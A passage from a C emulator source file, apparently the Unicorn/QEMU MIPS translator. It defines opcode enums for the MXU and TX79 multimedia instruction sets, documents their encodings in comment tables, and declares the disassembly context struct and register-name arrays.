OPC_MXU_S32LDDV = 0x00, OPC_MXU_S32LDDVR = 0x01, }; /* * MXU pool 07 */ enum { OPC_MXU_S32STDV = 0x00, OPC_MXU_S32STDVR = 0x01, }; /* * MXU pool 08 */ enum { OPC_MXU_S32LDI = 0x00, 
OPC_MXU_S32LDIR = 0x01, }; /* * MXU pool 09 */ enum { OPC_MXU_S32SDI = 0x00, OPC_MXU_S32SDIR = 0x01, }; /* * MXU pool 10 */ enum { OPC_MXU_S32LDIV = 0x00, OPC_MXU_S32LDIVR = 0x01, }; /* * MXU pool 11 */ enum { OPC_MXU_S32SDIV = 0x00, OPC_MXU_S32SDIVR = 0x01, }; /* * MXU pool 12 */ enum { OPC_MXU_D32ACC = 0x00, OPC_MXU_D32ACCM = 0x01, OPC_MXU_D32ASUM = 0x02, }; /* * MXU pool 13 */ enum { OPC_MXU_Q16ACC = 0x00, OPC_MXU_Q16ACCM = 0x01, OPC_MXU_Q16ASUM = 0x02, }; /* * MXU pool 14 */ enum { OPC_MXU_Q8ADDE = 0x00, OPC_MXU_D8SUM = 0x01, OPC_MXU_D8SUMC = 0x02, }; /* * MXU pool 15 */ enum { OPC_MXU_S32MUL = 0x00, OPC_MXU_S32MULU = 0x01, OPC_MXU_S32EXTR = 0x02, OPC_MXU_S32EXTRV = 0x03, }; /* * MXU pool 16 */ enum { OPC_MXU_D32SARW = 0x00, OPC_MXU_S32ALN = 0x01, OPC_MXU_S32ALNI = 0x02, OPC_MXU_S32LUI = 0x03, OPC_MXU_S32NOR = 0x04, OPC_MXU_S32AND = 0x05, OPC_MXU_S32OR = 0x06, OPC_MXU_S32XOR = 0x07, }; /* * MXU pool 17 */ enum { OPC_MXU_LXB = 0x00, OPC_MXU_LXH = 0x01, OPC_MXU_LXW = 0x03, OPC_MXU_LXBU = 0x04, OPC_MXU_LXHU = 0x05, }; /* * MXU pool 18 */ enum { OPC_MXU_D32SLLV = 0x00, OPC_MXU_D32SLRV = 0x01, OPC_MXU_D32SARV = 0x03, OPC_MXU_Q16SLLV = 0x04, OPC_MXU_Q16SLRV = 0x05, OPC_MXU_Q16SARV = 0x07, }; /* * MXU pool 19 */ enum { OPC_MXU_Q8MUL = 0x00, OPC_MXU_Q8MULSU = 0x01, }; /* * MXU pool 20 */ enum { OPC_MXU_Q8MOVZ = 0x00, OPC_MXU_Q8MOVN = 0x01, OPC_MXU_D16MOVZ = 0x02, OPC_MXU_D16MOVN = 0x03, OPC_MXU_S32MOVZ = 0x04, OPC_MXU_S32MOVN = 0x05, }; /* * MXU pool 21 */ enum { OPC_MXU_Q8MAC = 0x00, OPC_MXU_Q8MACSU = 0x01, }; /* * Overview of the TX79-specific instruction set * ============================================= * * The R5900 and the C790 have 128-bit wide GPRs, where the upper 64 bits * are only used by the specific quadword (128-bit) LQ/SQ load/store * instructions and certain multimedia instructions (MMIs). These MMIs * configure the 128-bit data path as two 64-bit, four 32-bit, eight 16-bit * or sixteen 8-bit paths. 
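 * For instance, PADDB (listed below) performs sixteen independent byte
 * additions; a minimal helper (a sketch only, with hypothetical operand
 * types, not the code used in this file) could look like
 *
 *     for (i = 0; i < 16; i++)
 *         dst.b[i] = (uint8_t)(a.b[i] + b.b[i]);
 *
 * with no carry propagating across lane boundaries.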
* * Reference: * * The Toshiba TX System RISC TX79 Core Architecture manual, * https://wiki.qemu.org/File:C790.pdf * * Three-Operand Multiply and Multiply-Add (4 instructions) * -------------------------------------------------------- * MADD [rd,] rs, rt Multiply/Add * MADDU [rd,] rs, rt Multiply/Add Unsigned * MULT [rd,] rs, rt Multiply (3-operand) * MULTU [rd,] rs, rt Multiply Unsigned (3-operand) * * Multiply Instructions for Pipeline 1 (10 instructions) * ------------------------------------------------------ * MULT1 [rd,] rs, rt Multiply Pipeline 1 * MULTU1 [rd,] rs, rt Multiply Unsigned Pipeline 1 * DIV1 rs, rt Divide Pipeline 1 * DIVU1 rs, rt Divide Unsigned Pipeline 1 * MADD1 [rd,] rs, rt Multiply-Add Pipeline 1 * MADDU1 [rd,] rs, rt Multiply-Add Unsigned Pipeline 1 * MFHI1 rd Move From HI1 Register * MFLO1 rd Move From LO1 Register * MTHI1 rs Move To HI1 Register * MTLO1 rs Move To LO1 Register * * Arithmetic (19 instructions) * ---------------------------- * PADDB rd, rs, rt Parallel Add Byte * PSUBB rd, rs, rt Parallel Subtract Byte * PADDH rd, rs, rt Parallel Add Halfword * PSUBH rd, rs, rt Parallel Subtract Halfword * PADDW rd, rs, rt Parallel Add Word * PSUBW rd, rs, rt Parallel Subtract Word * PADSBH rd, rs, rt Parallel Add/Subtract Halfword * PADDSB rd, rs, rt Parallel Add with Signed Saturation Byte * PSUBSB rd, rs, rt Parallel Subtract with Signed Saturation Byte * PADDSH rd, rs, rt Parallel Add with Signed Saturation Halfword * PSUBSH rd, rs, rt Parallel Subtract with Signed Saturation Halfword * PADDSW rd, rs, rt Parallel Add with Signed Saturation Word * PSUBSW rd, rs, rt Parallel Subtract with Signed Saturation Word * PADDUB rd, rs, rt Parallel Add with Unsigned saturation Byte * PSUBUB rd, rs, rt Parallel Subtract with Unsigned saturation Byte * PADDUH rd, rs, rt Parallel Add with Unsigned saturation Halfword * PSUBUH rd, rs, rt Parallel Subtract with Unsigned saturation Halfword * PADDUW rd, rs, rt Parallel Add with Unsigned saturation Word * PSUBUW rd, rs, rt Parallel Subtract with Unsigned saturation Word * * Min/Max (4 instructions) * ------------------------ * PMAXH rd, rs, rt Parallel Maximum Halfword * PMINH rd, rs, rt Parallel Minimum Halfword * PMAXW rd, rs, rt Parallel Maximum Word * PMINW rd, rs, rt Parallel Minimum Word * * Absolute (2 instructions) * ------------------------- * PABSH rd, rt Parallel Absolute Halfword * PABSW rd, rt Parallel Absolute Word * * Logical (4 instructions) * ------------------------ * PAND rd, rs, rt Parallel AND * POR rd, rs, rt Parallel OR * PXOR rd, rs, rt Parallel XOR * PNOR rd, rs, rt Parallel NOR * * Shift (9 instructions) * ---------------------- * PSLLH rd, rt, sa Parallel Shift Left Logical Halfword * PSRLH rd, rt, sa Parallel Shift Right Logical Halfword * PSRAH rd, rt, sa Parallel Shift Right Arithmetic Halfword * PSLLW rd, rt, sa Parallel Shift Left Logical Word * PSRLW rd, rt, sa Parallel Shift Right Logical Word * PSRAW rd, rt, sa Parallel Shift Right Arithmetic Word * PSLLVW rd, rt, rs Parallel Shift Left Logical Variable Word * PSRLVW rd, rt, rs Parallel Shift Right Logical Variable Word * PSRAVW rd, rt, rs Parallel Shift Right Arithmetic Variable Word * * Compare (6 instructions) * ------------------------ * PCGTB rd, rs, rt Parallel Compare for Greater Than Byte * PCEQB rd, rs, rt Parallel Compare for Equal Byte * PCGTH rd, rs, rt Parallel Compare for Greater Than Halfword * PCEQH rd, rs, rt Parallel Compare for Equal Halfword * PCGTW rd, rs, rt Parallel Compare for Greater Than Word * PCEQW rd, rs, rt 
Parallel Compare for Equal Word * * LZC (1 instruction) * ------------------- * PLZCW rd, rs Parallel Leading Zero or One Count Word * * Quadword Load and Store (2 instructions) * ---------------------------------------- * LQ rt, offset(base) Load Quadword * SQ rt, offset(base) Store Quadword * * Multiply and Divide (19 instructions) * ------------------------------------- * PMULTW rd, rs, rt Parallel Multiply Word * PMULTUW rd, rs, rt Parallel Multiply Unsigned Word * PDIVW rs, rt Parallel Divide Word * PDIVUW rs, rt Parallel Divide Unsigned Word * PMADDW rd, rs, rt Parallel Multiply-Add Word * PMADDUW rd, rs, rt Parallel Multiply-Add Unsigned Word * PMSUBW rd, rs, rt Parallel Multiply-Subtract Word * PMULTH rd, rs, rt Parallel Multiply Halfword * PMADDH rd, rs, rt Parallel Multiply-Add Halfword * PMSUBH rd, rs, rt Parallel Multiply-Subtract Halfword * PHMADH rd, rs, rt Parallel Horizontal Multiply-Add Halfword * PHMSBH rd, rs, rt Parallel Horizontal Multiply-Subtract Halfword * PDIVBW rs, rt Parallel Divide Broadcast Word * PMFHI rd Parallel Move From HI Register * PMFLO rd Parallel Move From LO Register * PMTHI rs Parallel Move To HI Register * PMTLO rs Parallel Move To LO Register * PMFHL rd Parallel Move From HI/LO Register * PMTHL rs Parallel Move To HI/LO Register * * Pack/Extend (11 instructions) * ----------------------------- * PPAC5 rd, rt Parallel Pack to 5 bits * PPACB rd, rs, rt Parallel Pack to Byte * PPACH rd, rs, rt Parallel Pack to Halfword * PPACW rd, rs, rt Parallel Pack to Word * PEXT5 rd, rt Parallel Extend Upper from 5 bits * PEXTUB rd, rs, rt Parallel Extend Upper from Byte * PEXTLB rd, rs, rt Parallel Extend Lower from Byte * PEXTUH rd, rs, rt Parallel Extend Upper from Halfword * PEXTLH rd, rs, rt Parallel Extend Lower from Halfword * PEXTUW rd, rs, rt Parallel Extend Upper from Word * PEXTLW rd, rs, rt Parallel Extend Lower from Word * * Others (16 instructions) * ------------------------ * PCPYH rd, rt Parallel Copy Halfword * PCPYLD rd, rs, rt Parallel Copy Lower Doubleword * PCPYUD rd, rs, rt Parallel Copy Upper Doubleword * PREVH rd, rt Parallel Reverse Halfword * PINTH rd, rs, rt Parallel Interleave Halfword * PINTEH rd, rs, rt Parallel Interleave Even Halfword * PEXEH rd, rt Parallel Exchange Even Halfword * PEXCH rd, rt Parallel Exchange Center Halfword * PEXEW rd, rt Parallel Exchange Even Word * PEXCW rd, rt Parallel Exchange Center Word * QFSRV rd, rs, rt Quadword Funnel Shift Right Variable * MFSA rd Move from Shift Amount Register * MTSA rs Move to Shift Amount Register * MTSAB rs, immediate Move Byte Count to Shift Amount Register * MTSAH rs, immediate Move Halfword Count to Shift Amount Register * PROT3W rd, rt Parallel Rotate 3 Words * * MMI (MultiMedia Instruction) encodings * ====================================== * * MMI instructions encoding table keys: * * * This code is reserved for future use. An attempt to execute it * causes a Reserved Instruction exception. * % This code indicates an instruction class. The instruction word * must be further decoded by examining additional tables that show * the values for other instruction fields. * # This code is reserved for the unsupported instructions DMULT, * DMULTU, DDIV, DDIVU, LL, LLD, SC, SCD, LWC2 and SWC2. An attempt * to execute it causes a Reserved Instruction exception. 
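 *
 * To read the encoding tables below: the row selects the upper bits of
 * the field and the column the lower bits. For example, LQ has opcode
 * 0x1E = 0b011110, so it appears at row 3 (bits 31..29 = 011),
 * column 6 (bits 28..26 = 110) of the opcode table.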
* * MMI instructions encoded by opcode field (MMI, LQ, SQ): * * 31 26 0 * +--------+----------------------------------------+ * | opcode | | * +--------+----------------------------------------+ * * opcode bits 28..26 * bits | 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 * 31..29 | 000 | 001 | 010 | 011 | 100 | 101 | 110 | 111 * -------+-------+-------+-------+-------+-------+-------+-------+------- * 0 000 |SPECIAL| REGIMM| J | JAL | BEQ | BNE | BLEZ | BGTZ * 1 001 | ADDI | ADDIU | SLTI | SLTIU | ANDI | ORI | XORI | LUI * 2 010 | COP0 | COP1 | * | * | BEQL | BNEL | BLEZL | BGTZL * 3 011 | DADDI | DADDIU| LDL | LDR | MMI% | * | LQ | SQ * 4 100 | LB | LH | LWL | LW | LBU | LHU | LWR | LWU * 5 101 | SB | SH | SWL | SW | SDL | SDR | SWR | CACHE * 6 110 | # | LWC1 | # | PREF | # | LDC1 | # | LD * 7 111 | # | SWC1 | # | * | # | SDC1 | # | SD */ enum { MMI_OPC_CLASS_MMI = 0x1C << 26, /* Same as OPC_SPECIAL2 */ MMI_OPC_LQ = 0x1E << 26, /* Same as OPC_MSA */ MMI_OPC_SQ = 0x1F << 26, /* Same as OPC_SPECIAL3 */ }; /* * MMI instructions with opcode field = MMI: * * 31 26 5 0 * +--------+-------------------------------+--------+ * | MMI | |function| * +--------+-------------------------------+--------+ * * function bits 2..0 * bits | 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 * 5..3 | 000 | 001 | 010 | 011 | 100 | 101 | 110 | 111 * -------+-------+-------+-------+-------+-------+-------+-------+------- * 0 000 | MADD | MADDU | * | * | PLZCW | * | * | * * 1 001 | MMI0% | MMI2% | * | * | * | * | * | * * 2 010 | MFHI1 | MTHI1 | MFLO1 | MTLO1 | * | * | * | * * 3 011 | MULT1 | MULTU1| DIV1 | DIVU1 | * | * | * | * * 4 100 | MADD1 | MADDU1| * | * | * | * | * | * * 5 101 | MMI1% | MMI3% | * | * | * | * | * | * * 6 110 | PMFHL | PMTHL | * | * | PSLLH | * | PSRLH | PSRAH * 7 111 | * | * | * | * | PSLLW | * | PSRLW | PSRAW */ #define MASK_MMI(op) (MASK_OP_MAJOR(op) | ((op) & 0x3F)) enum { MMI_OPC_MADD = 0x00 | MMI_OPC_CLASS_MMI, /* Same as OPC_MADD */ MMI_OPC_MADDU = 0x01 | MMI_OPC_CLASS_MMI, /* Same as OPC_MADDU */ MMI_OPC_PLZCW = 0x04 | MMI_OPC_CLASS_MMI, MMI_OPC_CLASS_MMI0 = 0x08 | MMI_OPC_CLASS_MMI, MMI_OPC_CLASS_MMI2 = 0x09 | MMI_OPC_CLASS_MMI, MMI_OPC_MFHI1 = 0x10 | MMI_OPC_CLASS_MMI, /* Same minor as OPC_MFHI */ MMI_OPC_MTHI1 = 0x11 | MMI_OPC_CLASS_MMI, /* Same minor as OPC_MTHI */ MMI_OPC_MFLO1 = 0x12 | MMI_OPC_CLASS_MMI, /* Same minor as OPC_MFLO */ MMI_OPC_MTLO1 = 0x13 | MMI_OPC_CLASS_MMI, /* Same minor as OPC_MTLO */ MMI_OPC_MULT1 = 0x18 | MMI_OPC_CLASS_MMI, /* Same minor as OPC_MULT */ MMI_OPC_MULTU1 = 0x19 | MMI_OPC_CLASS_MMI, /* Same min. 
as OPC_MULTU */ MMI_OPC_DIV1 = 0x1A | MMI_OPC_CLASS_MMI, /* Same minor as OPC_DIV */ MMI_OPC_DIVU1 = 0x1B | MMI_OPC_CLASS_MMI, /* Same minor as OPC_DIVU */ MMI_OPC_MADD1 = 0x20 | MMI_OPC_CLASS_MMI, MMI_OPC_MADDU1 = 0x21 | MMI_OPC_CLASS_MMI, MMI_OPC_CLASS_MMI1 = 0x28 | MMI_OPC_CLASS_MMI, MMI_OPC_CLASS_MMI3 = 0x29 | MMI_OPC_CLASS_MMI, MMI_OPC_PMFHL = 0x30 | MMI_OPC_CLASS_MMI, MMI_OPC_PMTHL = 0x31 | MMI_OPC_CLASS_MMI, MMI_OPC_PSLLH = 0x34 | MMI_OPC_CLASS_MMI, MMI_OPC_PSRLH = 0x36 | MMI_OPC_CLASS_MMI, MMI_OPC_PSRAH = 0x37 | MMI_OPC_CLASS_MMI, MMI_OPC_PSLLW = 0x3C | MMI_OPC_CLASS_MMI, MMI_OPC_PSRLW = 0x3E | MMI_OPC_CLASS_MMI, MMI_OPC_PSRAW = 0x3F | MMI_OPC_CLASS_MMI, }; /* * MMI instructions with opcode field = MMI and bits 5..0 = MMI0: * * 31 26 10 6 5 0 * +--------+----------------------+--------+--------+ * | MMI | |function| MMI0 | * +--------+----------------------+--------+--------+ * * function bits 7..6 * bits | 0 | 1 | 2 | 3 * 10..8 | 00 | 01 | 10 | 11 * -------+-------+-------+-------+------- * 0 000 | PADDW | PSUBW | PCGTW | PMAXW * 1 001 | PADDH | PSUBH | PCGTH | PMAXH * 2 010 | PADDB | PSUBB | PCGTB | * * 3 011 | * | * | * | * * 4 100 | PADDSW| PSUBSW| PEXTLW| PPACW * 5 101 | PADDSH| PSUBSH| PEXTLH| PPACH * 6 110 | PADDSB| PSUBSB| PEXTLB| PPACB * 7 111 | * | * | PEXT5 | PPAC5 */ #define MASK_MMI0(op) (MASK_OP_MAJOR(op) | ((op) & 0x7FF)) enum { MMI_OPC_0_PADDW = (0x00 << 6) | MMI_OPC_CLASS_MMI0, MMI_OPC_0_PSUBW = (0x01 << 6) | MMI_OPC_CLASS_MMI0, MMI_OPC_0_PCGTW = (0x02 << 6) | MMI_OPC_CLASS_MMI0, MMI_OPC_0_PMAXW = (0x03 << 6) | MMI_OPC_CLASS_MMI0, MMI_OPC_0_PADDH = (0x04 << 6) | MMI_OPC_CLASS_MMI0, MMI_OPC_0_PSUBH = (0x05 << 6) | MMI_OPC_CLASS_MMI0, MMI_OPC_0_PCGTH = (0x06 << 6) | MMI_OPC_CLASS_MMI0, MMI_OPC_0_PMAXH = (0x07 << 6) | MMI_OPC_CLASS_MMI0, MMI_OPC_0_PADDB = (0x08 << 6) | MMI_OPC_CLASS_MMI0, MMI_OPC_0_PSUBB = (0x09 << 6) | MMI_OPC_CLASS_MMI0, MMI_OPC_0_PCGTB = (0x0A << 6) | MMI_OPC_CLASS_MMI0, MMI_OPC_0_PADDSW = (0x10 << 6) | MMI_OPC_CLASS_MMI0, MMI_OPC_0_PSUBSW = (0x11 << 6) | MMI_OPC_CLASS_MMI0, MMI_OPC_0_PEXTLW = (0x12 << 6) | MMI_OPC_CLASS_MMI0, MMI_OPC_0_PPACW = (0x13 << 6) | MMI_OPC_CLASS_MMI0, MMI_OPC_0_PADDSH = (0x14 << 6) | MMI_OPC_CLASS_MMI0, MMI_OPC_0_PSUBSH = (0x15 << 6) | MMI_OPC_CLASS_MMI0, MMI_OPC_0_PEXTLH = (0x16 << 6) | MMI_OPC_CLASS_MMI0, MMI_OPC_0_PPACH = (0x17 << 6) | MMI_OPC_CLASS_MMI0, MMI_OPC_0_PADDSB = (0x18 << 6) | MMI_OPC_CLASS_MMI0, MMI_OPC_0_PSUBSB = (0x19 << 6) | MMI_OPC_CLASS_MMI0, MMI_OPC_0_PEXTLB = (0x1A << 6) | MMI_OPC_CLASS_MMI0, MMI_OPC_0_PPACB = (0x1B << 6) | MMI_OPC_CLASS_MMI0, MMI_OPC_0_PEXT5 = (0x1E << 6) | MMI_OPC_CLASS_MMI0, MMI_OPC_0_PPAC5 = (0x1F << 6) | MMI_OPC_CLASS_MMI0, }; /* * MMI instructions with opcode field = MMI and bits 5..0 = MMI1: * * 31 26 10 6 5 0 * +--------+----------------------+--------+--------+ * | MMI | |function| MMI1 | * +--------+----------------------+--------+--------+ * * function bits 7..6 * bits | 0 | 1 | 2 | 3 * 10..8 | 00 | 01 | 10 | 11 * -------+-------+-------+-------+------- * 0 000 | * | PABSW | PCEQW | PMINW * 1 001 | PADSBH| PABSH | PCEQH | PMINH * 2 010 | * | * | PCEQB | * * 3 011 | * | * | * | * * 4 100 | PADDUW| PSUBUW| PEXTUW| * * 5 101 | PADDUH| PSUBUH| PEXTUH| * * 6 110 | PADDUB| PSUBUB| PEXTUB| QFSRV * 7 111 | * | * | * | * */ #define MASK_MMI1(op) (MASK_OP_MAJOR(op) | ((op) & 0x7FF)) enum { MMI_OPC_1_PABSW = (0x01 << 6) | MMI_OPC_CLASS_MMI1, MMI_OPC_1_PCEQW = (0x02 << 6) | MMI_OPC_CLASS_MMI1, MMI_OPC_1_PMINW = (0x03 << 6) | MMI_OPC_CLASS_MMI1, MMI_OPC_1_PADSBH = (0x04 << 6) | 
MMI_OPC_CLASS_MMI1, MMI_OPC_1_PABSH = (0x05 << 6) | MMI_OPC_CLASS_MMI1, MMI_OPC_1_PCEQH = (0x06 << 6) | MMI_OPC_CLASS_MMI1, MMI_OPC_1_PMINH = (0x07 << 6) | MMI_OPC_CLASS_MMI1, MMI_OPC_1_PCEQB = (0x0A << 6) | MMI_OPC_CLASS_MMI1, MMI_OPC_1_PADDUW = (0x10 << 6) | MMI_OPC_CLASS_MMI1, MMI_OPC_1_PSUBUW = (0x11 << 6) | MMI_OPC_CLASS_MMI1, MMI_OPC_1_PEXTUW = (0x12 << 6) | MMI_OPC_CLASS_MMI1, MMI_OPC_1_PADDUH = (0x14 << 6) | MMI_OPC_CLASS_MMI1, MMI_OPC_1_PSUBUH = (0x15 << 6) | MMI_OPC_CLASS_MMI1, MMI_OPC_1_PEXTUH = (0x16 << 6) | MMI_OPC_CLASS_MMI1, MMI_OPC_1_PADDUB = (0x18 << 6) | MMI_OPC_CLASS_MMI1, MMI_OPC_1_PSUBUB = (0x19 << 6) | MMI_OPC_CLASS_MMI1, MMI_OPC_1_PEXTUB = (0x1A << 6) | MMI_OPC_CLASS_MMI1, MMI_OPC_1_QFSRV = (0x1B << 6) | MMI_OPC_CLASS_MMI1, }; /* * MMI instructions with opcode field = MMI and bits 5..0 = MMI2: * * 31 26 10 6 5 0 * +--------+----------------------+--------+--------+ * | MMI | |function| MMI2 | * +--------+----------------------+--------+--------+ * * function bits 7..6 * bits | 0 | 1 | 2 | 3 * 10..8 | 00 | 01 | 10 | 11 * -------+-------+-------+-------+------- * 0 000 | PMADDW| * | PSLLVW| PSRLVW * 1 001 | PMSUBW| * | * | * * 2 010 | PMFHI | PMFLO | PINTH | * * 3 011 | PMULTW| PDIVW | PCPYLD| * * 4 100 | PMADDH| PHMADH| PAND | PXOR * 5 101 | PMSUBH| PHMSBH| * | * * 6 110 | * | * | PEXEH | PREVH * 7 111 | PMULTH| PDIVBW| PEXEW | PROT3W */ #define MASK_MMI2(op) (MASK_OP_MAJOR(op) | ((op) & 0x7FF)) enum { MMI_OPC_2_PMADDW = (0x00 << 6) | MMI_OPC_CLASS_MMI2, MMI_OPC_2_PSLLVW = (0x02 << 6) | MMI_OPC_CLASS_MMI2, MMI_OPC_2_PSRLVW = (0x03 << 6) | MMI_OPC_CLASS_MMI2, MMI_OPC_2_PMSUBW = (0x04 << 6) | MMI_OPC_CLASS_MMI2, MMI_OPC_2_PMFHI = (0x08 << 6) | MMI_OPC_CLASS_MMI2, MMI_OPC_2_PMFLO = (0x09 << 6) | MMI_OPC_CLASS_MMI2, MMI_OPC_2_PINTH = (0x0A << 6) | MMI_OPC_CLASS_MMI2, MMI_OPC_2_PMULTW = (0x0C << 6) | MMI_OPC_CLASS_MMI2, MMI_OPC_2_PDIVW = (0x0D << 6) | MMI_OPC_CLASS_MMI2, MMI_OPC_2_PCPYLD = (0x0E << 6) | MMI_OPC_CLASS_MMI2, MMI_OPC_2_PMADDH = (0x10 << 6) | MMI_OPC_CLASS_MMI2, MMI_OPC_2_PHMADH = (0x11 << 6) | MMI_OPC_CLASS_MMI2, MMI_OPC_2_PAND = (0x12 << 6) | MMI_OPC_CLASS_MMI2, MMI_OPC_2_PXOR = (0x13 << 6) | MMI_OPC_CLASS_MMI2, MMI_OPC_2_PMSUBH = (0x14 << 6) | MMI_OPC_CLASS_MMI2, MMI_OPC_2_PHMSBH = (0x15 << 6) | MMI_OPC_CLASS_MMI2, MMI_OPC_2_PEXEH = (0x1A << 6) | MMI_OPC_CLASS_MMI2, MMI_OPC_2_PREVH = (0x1B << 6) | MMI_OPC_CLASS_MMI2, MMI_OPC_2_PMULTH = (0x1C << 6) | MMI_OPC_CLASS_MMI2, MMI_OPC_2_PDIVBW = (0x1D << 6) | MMI_OPC_CLASS_MMI2, MMI_OPC_2_PEXEW = (0x1E << 6) | MMI_OPC_CLASS_MMI2, MMI_OPC_2_PROT3W = (0x1F << 6) | MMI_OPC_CLASS_MMI2, }; /* * MMI instructions with opcode field = MMI and bits 5..0 = MMI3: * * 31 26 10 6 5 0 * +--------+----------------------+--------+--------+ * | MMI | |function| MMI3 | * +--------+----------------------+--------+--------+ * * function bits 7..6 * bits | 0 | 1 | 2 | 3 * 10..8 | 00 | 01 | 10 | 11 * -------+-------+-------+-------+------- * 0 000 |PMADDUW| * | * | PSRAVW * 1 001 | * | * | * | * * 2 010 | PMTHI | PMTLO | PINTEH| * * 3 011 |PMULTUW| PDIVUW| PCPYUD| * * 4 100 | * | * | POR | PNOR * 5 101 | * | * | * | * * 6 110 | * | * | PEXCH | PCPYH * 7 111 | * | * | PEXCW | * */ #define MASK_MMI3(op) (MASK_OP_MAJOR(op) | ((op) & 0x7FF)) enum { MMI_OPC_3_PMADDUW = (0x00 << 6) | MMI_OPC_CLASS_MMI3, MMI_OPC_3_PSRAVW = (0x03 << 6) | MMI_OPC_CLASS_MMI3, MMI_OPC_3_PMTHI = (0x08 << 6) | MMI_OPC_CLASS_MMI3, MMI_OPC_3_PMTLO = (0x09 << 6) | MMI_OPC_CLASS_MMI3, MMI_OPC_3_PINTEH = (0x0A << 6) | MMI_OPC_CLASS_MMI3, MMI_OPC_3_PMULTUW = (0x0C << 6) | 
MMI_OPC_CLASS_MMI3, MMI_OPC_3_PDIVUW = (0x0D << 6) | MMI_OPC_CLASS_MMI3, MMI_OPC_3_PCPYUD = (0x0E << 6) | MMI_OPC_CLASS_MMI3, MMI_OPC_3_POR = (0x12 << 6) | MMI_OPC_CLASS_MMI3, MMI_OPC_3_PNOR = (0x13 << 6) | MMI_OPC_CLASS_MMI3, MMI_OPC_3_PEXCH = (0x1A << 6) | MMI_OPC_CLASS_MMI3, MMI_OPC_3_PCPYH = (0x1B << 6) | MMI_OPC_CLASS_MMI3, MMI_OPC_3_PEXCW = (0x1E << 6) | MMI_OPC_CLASS_MMI3, }; #include "exec/gen-icount.h" #define gen_helper_0e0i(name, arg) do { \ TCGv_i32 helper_tmp = tcg_const_i32(tcg_ctx, arg); \ gen_helper_##name(tcg_ctx, tcg_ctx->cpu_env, helper_tmp); \ tcg_temp_free_i32(tcg_ctx, helper_tmp); \ } while (0) #define gen_helper_0e1i(name, arg1, arg2) do { \ TCGv_i32 helper_tmp = tcg_const_i32(tcg_ctx, arg2); \ gen_helper_##name(tcg_ctx, tcg_ctx->cpu_env, arg1, helper_tmp); \ tcg_temp_free_i32(tcg_ctx, helper_tmp); \ } while (0) #define gen_helper_1e0i(name, ret, arg1) do { \ TCGv_i32 helper_tmp = tcg_const_i32(tcg_ctx, arg1); \ gen_helper_##name(tcg_ctx, ret, tcg_ctx->cpu_env, helper_tmp); \ tcg_temp_free_i32(tcg_ctx, helper_tmp); \ } while (0) #define gen_helper_1e1i(name, ret, arg1, arg2) do { \ TCGv_i32 helper_tmp = tcg_const_i32(tcg_ctx, arg2); \ gen_helper_##name(tcg_ctx, ret, tcg_ctx->cpu_env, arg1, helper_tmp); \ tcg_temp_free_i32(tcg_ctx, helper_tmp); \ } while (0) #define gen_helper_0e2i(name, arg1, arg2, arg3) do { \ TCGv_i32 helper_tmp = tcg_const_i32(tcg_ctx, arg3); \ gen_helper_##name(tcg_ctx, tcg_ctx->cpu_env, arg1, arg2, helper_tmp); \ tcg_temp_free_i32(tcg_ctx, helper_tmp); \ } while (0) #define gen_helper_1e2i(name, ret, arg1, arg2, arg3) do { \ TCGv_i32 helper_tmp = tcg_const_i32(tcg_ctx, arg3); \ gen_helper_##name(tcg_ctx, ret, tcg_ctx->cpu_env, arg1, arg2, helper_tmp); \ tcg_temp_free_i32(tcg_ctx, helper_tmp); \ } while (0) #define gen_helper_0e3i(name, arg1, arg2, arg3, arg4) do { \ TCGv_i32 helper_tmp = tcg_const_i32(tcg_ctx, arg4); \ gen_helper_##name(tcg_ctx, tcg_ctx->cpu_env, arg1, arg2, arg3, helper_tmp); \ tcg_temp_free_i32(tcg_ctx, helper_tmp); \ } while (0) typedef struct DisasContext { DisasContextBase base; target_ulong saved_pc; target_ulong page_start; uint32_t opcode; uint64_t insn_flags; int32_t CP0_Config1; int32_t CP0_Config2; int32_t CP0_Config3; int32_t CP0_Config5; /* Routine used to access memory */ int mem_idx; MemOp default_tcg_memop_mask; uint32_t hflags, saved_hflags; target_ulong btarget; bool ulri; int kscrexist; bool rxi; int ie; bool bi; bool bp; uint64_t PAMask; bool mvh; bool eva; bool sc; int CP0_LLAddr_shift; bool ps; bool vp; bool cmgcr; bool mrp; bool nan2008; bool abs2008; bool saar; bool mi; int gi; // Unicorn struct uc_struct *uc; } DisasContext; #define DISAS_STOP DISAS_TARGET_0 #define DISAS_EXIT DISAS_TARGET_1 static const char * const regnames[] = { "r0", "at", "v0", "v1", "a0", "a1", "a2", "a3", "t0", "t1", "t2", "t3", "t4", "t5", "t6", "t7", "s0", "s1", "s2", "s3", "s4", "s5", "s6", "s7", "t8", "t9", "k0", "k1", "gp", "sp", "s8", "ra", }; static const char * const regnames_HI[] = { "HI0", "HI1", "HI2", "HI3", }; static const char * const regnames_LO[] = { "LO0", "LO1", "LO2", "LO3", }; static const char * const msaregnames[] = { "w0.d0", "w0.d1", "w1.d0", "w1.d1", "w2.d0", "w2.d1", "w3.d0", "w3.d1", "w4.d0", "w4.d1", "w5.d0", "w5.d1", "w6.d0", "w6.d1", "w7.d0", "w7.d1", "w8.d0", "w8.d1", "w9.d0", "w9.d1", "w10.d0", "w10.d1", "w11.d0", "w11.d1", "w12.d0", "w12.d1", "w13.d0", "w13.d1", "w14.d0", "w14.d1", "w15.d0", "w15.d1", "w16.d0", "w16.d1", "w17.d0", "w17.d1", "w18.d0", "w18.d1", "w19.d0", "w19.d1", "w20.d0", 
"w20.d1", "w21.d0", "w21.d1", "w22.d0", "w22.d1", "w23.d0", "w23.d1", "w24.d0", "w24.d1", "w25.d0", "w25.d1", "w26.d0", "w26.d1", "w27.d0", "w27.d1", "w28.d0", "w28.d1", "w29.d0", "w29.d1", "w30.d0", "w30.d1", "w31.d0", "w31.d1", }; #if !defined(TARGET_MIPS64) static const char * const mxuregnames[] = { "XR1", "XR2", "XR3", "XR4", "XR5", "XR6", "XR7", "XR8", "XR9", "XR10", "XR11", "XR12", "XR13", "XR14", "XR15", "MXU_CR", }; #endif #define LOG_DISAS(...) \ do { \ if (MIPS_DEBUG_DISAS) { \ qemu_log_mask(CPU_LOG_TB_IN_ASM, ## __VA_ARGS__); \ } \ } while (0) #define MIPS_INVAL(op) \ do { \ if (MIPS_DEBUG_DISAS) { \ qemu_log_mask(CPU_LOG_TB_IN_ASM, \ TARGET_FMT_lx ": %08x Invalid %s %03x %03x %03x\n", \ ctx->base.pc_next, ctx->opcode, op, \ ctx->opcode >> 26, ctx->opcode & 0x3F, \ ((ctx->opcode >> 16) & 0x1F)); \ } \ } while (0) /* General purpose registers moves. */ static inline void gen_load_gpr(TCGContext 